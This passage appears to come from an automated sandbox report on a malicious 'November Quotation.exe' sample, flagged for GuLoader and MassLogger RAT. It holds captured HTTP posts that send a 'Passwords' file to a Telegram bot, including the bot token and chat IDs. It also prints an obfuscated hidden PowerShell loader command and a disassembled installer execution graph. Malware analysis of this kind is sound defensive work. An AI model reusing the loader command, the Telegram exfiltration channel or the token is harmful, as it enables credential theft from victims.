                                                                                                            2024-11-25 12:48:16 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 65 61 32 62 64 33 66 30 32 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0ea2bd3f0271Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:48:17 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:48:17 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 576
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:48:17 UTC576INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":648,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.949977149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:48:20 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0ec7800118d6
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:48:20 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 65 63 37 38 30 30 31 31 38 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0ec7800118d6Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:48:20 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:48:20 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 576
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:48:20 UTC576INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":649,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.949985149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:48:23 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0ef14330ed3d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:48:23 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 65 66 31 34 33 33 30 65 64 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0ef14330ed3dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:48:24 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:48:24 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 576
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:48:24 UTC576INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":650,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.949996149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:48:27 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0f1d5bb4e543
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:48:27 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 66 31 64 35 62 62 34 65 35 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0f1d5bb4e543Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:48:27 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:48:27 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 576
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:48:27 UTC576INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":651,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.950004149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:48:30 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0f4e57a81a2b
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:48:30 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 66 34 65 35 37 61 38 31 61 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0f4e57a81a2bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:48:31 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:48:31 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 576
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:48:31 UTC576INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":652,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:07:46:27
                                                                                                            Start date:25/11/2024
                                                                                                            Path:C:\Users\user\Desktop\November Quotation.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\November Quotation.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:778'344 bytes
                                                                                                            MD5 hash:EBFE0469CA7E7A5CA4957B72BF4B1A48
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:2
                                                                                                            Start time:07:46:27
                                                                                                            Start date:25/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:powershell.exe -windowstyle hidden "$Mendicity=Get-Content -raw 'C:\Users\user\AppData\Local\sognenes\iconograph\Saddelknapperne.Srv';$Umiskendelighed=$Mendicity.SubString(5275,3);.$Umiskendelighed($Mendicity) "
                                                                                                            Imagebase:0xe40000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1865707382.000000000A569000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:07:46:27
                                                                                                            Start date:25/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff70f010000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:07:47:20
                                                                                                            Start date:25/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                            Imagebase:0x140000
                                                                                                            File size:59'904 bytes
                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2583646535.0000000024112000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2561413904.0000000005439000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:24.3%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:21.3%
                                                                                                              Total number of Nodes:1265
                                                                                                              Total number of Limit Nodes:33
                                                                                                              execution_graph 3532 401d41 GetDC GetDeviceCaps 3533 402b1b 18 API calls 3532->3533 3534 401d5f MulDiv ReleaseDC 3533->3534 3535 402b1b 18 API calls 3534->3535 3536 401d7e 3535->3536 3537 405dc3 18 API calls 3536->3537 3538 401db7 CreateFontIndirectW 3537->3538 3539 4024e6 3538->3539 3540 401a42 3541 402b1b 18 API calls 3540->3541 3542 401a48 3541->3542 3543 402b1b 18 API calls 3542->3543 3544 4019f0 3543->3544 3545 402744 3546 40273f 3545->3546 3546->3545 3547 402754 FindNextFileW 3546->3547 3548 4027a6 3547->3548 3549 40275f 3547->3549 3551 405da1 lstrcpynW 3548->3551 3551->3549 3552 401cc6 3553 402b1b 18 API calls 3552->3553 3554 401cd9 SetWindowLongW 3553->3554 3555 4029c5 3554->3555 2900 401dc7 2908 402b1b 2900->2908 2902 401dcd 2903 402b1b 18 API calls 2902->2903 2904 401dd6 2903->2904 2905 401de8 EnableWindow 2904->2905 2906 401ddd ShowWindow 2904->2906 2907 4029c5 2905->2907 2906->2907 2909 405dc3 18 API calls 2908->2909 2910 402b2f 2909->2910 2910->2902 3556 4049c7 GetDlgItem GetDlgItem 3557 404a19 7 API calls 3556->3557 3564 404c32 3556->3564 3558 404abc DeleteObject 3557->3558 3559 404aaf SendMessageW 3557->3559 3560 404ac5 3558->3560 3559->3558 3562 404afc 3560->3562 3563 405dc3 18 API calls 3560->3563 3561 404d16 3567 404dc2 3561->3567 3576 404d6f SendMessageW 3561->3576 3599 404c25 3561->3599 3566 403fe6 19 API calls 3562->3566 3568 404ade SendMessageW SendMessageW 3563->3568 3564->3561 3565 404ca3 3564->3565 3609 404915 SendMessageW 3564->3609 3565->3561 3573 404d08 SendMessageW 3565->3573 3571 404b10 3566->3571 3569 404dd4 3567->3569 3570 404dcc SendMessageW 3567->3570 3568->3560 3578 404de6 ImageList_Destroy 3569->3578 3579 404ded 3569->3579 3595 404dfd 3569->3595 3570->3569 3575 403fe6 19 API calls 3571->3575 3572 40404d 8 API calls 3577 404fb8 3572->3577 3573->3561 3589 404b1e 3575->3589 3581 404d84 SendMessageW 3576->3581 3576->3599 3578->3579 3582 404df6 GlobalFree 3579->3582 3579->3595 3580 404f6c 3585 404f7e ShowWindow GetDlgItem ShowWindow 3580->3585 3580->3599 3584 404d97 3581->3584 3582->3595 3583 404bf3 GetWindowLongW SetWindowLongW 3586 404c0c 3583->3586 3590 404da8 SendMessageW 3584->3590 3585->3599 3587 404c12 ShowWindow 3586->3587 3588 404c2a 3586->3588 3607 40401b SendMessageW 3587->3607 3608 40401b SendMessageW 3588->3608 3589->3583 3591 404bed 3589->3591 3594 404b6e SendMessageW 3589->3594 3596 404baa SendMessageW 3589->3596 3597 404bbb SendMessageW 3589->3597 3590->3567 3591->3583 3591->3586 3594->3589 3595->3580 3601 404e38 3595->3601 3614 404995 3595->3614 3596->3589 3597->3589 3599->3572 3600 404f42 InvalidateRect 3600->3580 3602 404f58 3600->3602 3603 404e66 SendMessageW 3601->3603 3604 404e7c 3601->3604 3623 40482f 3602->3623 3603->3604 3604->3600 3606 404ef0 SendMessageW SendMessageW 3604->3606 3606->3604 3607->3599 3608->3564 3610 404974 SendMessageW 3609->3610 3611 404938 GetMessagePos ScreenToClient SendMessageW 3609->3611 3612 40496c 3610->3612 3611->3612 3613 404971 3611->3613 3612->3565 3613->3610 3631 405da1 lstrcpynW 3614->3631 3616 4049a8 3632 405ce8 wsprintfW 3616->3632 3618 4049b2 3619 40140b 2 API calls 3618->3619 3620 4049bb 3619->3620 3633 405da1 lstrcpynW 3620->3633 3622 4049c2 3622->3601 3624 40484c 3623->3624 3625 405dc3 18 API calls 3624->3625 3626 404881 3625->3626 3627 405dc3 18 API calls 3626->3627 3628 40488c 3627->3628 3629 405dc3 18 API calls 3628->3629 3630 4048bd lstrlenW wsprintfW SetDlgItemTextW 3629->3630 3630->3580 3631->3616 3632->3618 3633->3622 3634 4047c9 3635 4047f5 3634->3635 3636 4047d9 3634->3636 3637 404828 3635->3637 3638 4047fb SHGetPathFromIDListW 3635->3638 3645 405561 GetDlgItemTextW 3636->3645 3640 404812 SendMessageW 3638->3640 3641 40480b 3638->3641 3640->3637 3643 40140b 2 API calls 3641->3643 3642 4047e6 SendMessageW 3642->3635 3643->3640 3645->3642 3177 401bca 3178 402b1b 18 API calls 3177->3178 3179 401bd1 3178->3179 3180 402b1b 18 API calls 3179->3180 3181 401bdb 3180->3181 3182 402b38 18 API calls 3181->3182 3186 401beb 3181->3186 3182->3186 3183 402b38 18 API calls 3187 401bfb 3183->3187 3184 401c06 3188 402b1b 18 API calls 3184->3188 3185 401c4a 3189 402b38 18 API calls 3185->3189 3186->3183 3186->3187 3187->3184 3187->3185 3190 401c0b 3188->3190 3191 401c4f 3189->3191 3192 402b1b 18 API calls 3190->3192 3193 402b38 18 API calls 3191->3193 3195 401c14 3192->3195 3194 401c58 FindWindowExW 3193->3194 3198 401c7a 3194->3198 3196 401c3a SendMessageW 3195->3196 3197 401c1c SendMessageTimeoutW 3195->3197 3196->3198 3197->3198 3646 4024ca 3647 402b38 18 API calls 3646->3647 3648 4024d1 3647->3648 3651 405a0d GetFileAttributesW CreateFileW 3648->3651 3650 4024dd 3651->3650 3268 4014cb 3269 40504b 25 API calls 3268->3269 3270 4014d2 3269->3270 3652 40194b 3653 402b1b 18 API calls 3652->3653 3654 401952 3653->3654 3655 402b1b 18 API calls 3654->3655 3656 40195c 3655->3656 3657 402b38 18 API calls 3656->3657 3658 401965 3657->3658 3659 401979 lstrlenW 3658->3659 3660 4019b5 3658->3660 3661 401983 3659->3661 3661->3660 3665 405da1 lstrcpynW 3661->3665 3663 40199e 3663->3660 3664 4019ab lstrlenW 3663->3664 3664->3660 3665->3663 3666 4019cf 3667 402b38 18 API calls 3666->3667 3668 4019d6 3667->3668 3669 402b38 18 API calls 3668->3669 3670 4019df 3669->3670 3671 4019e6 lstrcmpiW 